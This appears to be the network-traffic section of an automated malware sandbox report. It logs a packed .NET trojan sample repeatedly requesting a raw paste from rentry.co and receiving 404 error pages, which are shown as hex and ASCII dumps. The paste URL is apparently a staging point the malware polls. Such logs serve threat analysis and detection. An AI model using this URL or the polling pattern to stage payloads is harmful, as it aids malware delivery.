                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8dRJ5NtvoCQTJEZpDmmaQDU6raXQeF7m%2BeIYaI5sRiuujcgvL4XuKczioIQvJooYZ2I%2BYe6YHuCpyT5k5ZZHxlyDULZP1TKIbEJzEmT7ik7Q8m50EmFY%2Fkz%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eafd1e6c2cc8-DFW
                                                                                        2024-10-18 10:41:47 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:41:47 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:41:47 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:41:47 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 61 66 64 31 65 36 63 32 63 63 38 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 77 4e 79 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eafd1e6c2cc8',t:'MTcyOTI0ODEwNy4wMDAw
                                                                                        2024-10-18 10:41:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.660606104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:41:49 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:41:50 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:41:50 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUiEVFQ8JeJjKYl513WMNd3c8IqshGWk0XmoAW9bfRjymOX1D%2FXv%2BKDnH2Y8EQsF5xhM5xPXipqYWUmP6tDSymE5MnTOCIA3IJQSna74q8IgVTqoX3%2F7TI5jLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb0fbd42e9b1-DFW
                                                                                        2024-10-18 10:41:50 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:41:50 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:41:50 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:41:50 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 30 66 62 64 34 32 65 39 62 31 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 78 4d 43 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb0fbd42e9b1',t:'MTcyOTI0ODExMC4wMDAwMD
                                                                                        2024-10-18 10:41:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.660608104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:41:52 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:41:53 UTC681INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:41:53 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZKULzn72Xjetk9Mwmw0iMI%2FVJN294QiQeTjLmeaiWZISIVHAlO%2FAQSdRlxas1AwBJWvYCC7k7csPuO38uDpJq29qh9Q%2BsYSGdhywcBkUM%2FJ3pXK2bZp2Jarfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb227ee30c13-DFW
                                                                                        2024-10-18 10:41:53 UTC688INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:41:53 UTC1369INData Raw: 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64
                                                                                        Data Ascii: ons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and ed
                                                                                        2024-10-18 10:41:53 UTC1369INData Raw: 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69
                                                                                        Data Ascii: try.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container contai
                                                                                        2024-10-18 10:41:53 UTC1034INData Raw: 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 32 32 37 65 65 33 30 63 31 33 27 2c
                                                                                        Data Ascii: ipt src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb227ee30c13',
                                                                                        2024-10-18 10:41:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.660609104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:41:56 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:41:56 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:41:56 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mg9qr3EqlzelfvxW0x2bPj1VQVK2YntWKeydhqWS9haiwqklsTNu77TKcCv6CPFPDCq5pT4bRMOykKIChQqjyKzGUsTa1BZ9AP7ZULrgf1T5L1wQ7N6D%2FVM5tw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb382fb56bc5-DFW
                                                                                        2024-10-18 10:41:56 UTC717INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:41:56 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:41:56 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:41:56 UTC1005INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 33 38 32 66 62 35 36 62 63 35 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 78 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb382fb56bc5',t:'MTcyOTI0ODExNi4wMDAwMDA='}
                                                                                        2024-10-18 10:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.660612104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:41:59 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:00 UTC681INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:00 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6dkOalz9khkXTcvB2C66VE6GBOhwFnD%2FNONDdwvWxC86vKrZMHLvUHhzUeebaiAkLoT2lpRxnUu3c8SkSzK7p1TBybz4G%2BOSv%2B1p6HicKv1j8tWN9FsPh%2BA4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb4acfbeeb02-DFW
